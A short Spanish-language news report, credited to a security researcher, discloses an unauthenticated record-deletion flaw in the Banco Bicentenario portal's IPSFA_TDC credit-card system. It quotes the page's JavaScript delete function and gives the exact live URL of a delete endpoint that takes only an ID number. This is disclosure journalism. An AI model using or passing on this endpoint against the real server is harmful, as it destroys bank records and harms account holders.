PrensaToday

Fallas de seguridad en el portal del Banco Bicentenario permite eliminar registros

Varios usuarios que poseen cuentas en el Banco Bicentenario han reportado fallas de seguridad en su página web, pues con solo tener un mínimo conocimiento informático se puede acceder fácilmente a la base de datos y eliminar cualquier registro.
El portal tiene varias vulnerabilidades en consultas, modificaciones y eliminación de cada tarjeta de crédito.
bancaenlinea.bicentenariobu.com 
Bicentenario
Al activar el VPN en el navegador Google Chrome, se puede observar la siguiente dirección de servidor basado en Apeche Tomcat
http://consultatdcbb.bicentenariobu.com:8080/ipsfa_tdc/action/consultar/form
Bicentenario1
Después de hacer esto, nos encontramos con un Java Script. Este sistema es llamado IPSFA_TDC para ubicar el registro de las tarjetas de crédito del ejército de Venezuela.
<script type=»text/javascript» src=»/ipsfa_tdc/action/script»>

El código:
//eliminar un registro
function deleteRecord(id)
{
if (window.confirm(«¿Está seguro que desea ELIMINAR este registro?»)==false)
{
return false;
}

//llamada Ajax…
ajaxCall(httpMethod=»GET», 
uri=»/action/consultar/delete?id=» + id,
divResponse=null, 
divProgress=»status», 
formName=null, 
afterResponseFn=null, 

Para realizar la eliminación definitiva del registro en la base de datos solo se necesita un D.N.I (ID).
Vínculo exacto:

> action/consultar/delete?id=
> http://consultatdcbb.bicentenariobu.com:8080/ipsfa_tdc/action/consultar/delete?id= (D.N.I)

Bicentenario2
De esta forma el registro es eliminado definitivamente del portal web.
Fuente: Kelvin Parra – Research Security

Agregar comentario

Deja un comentario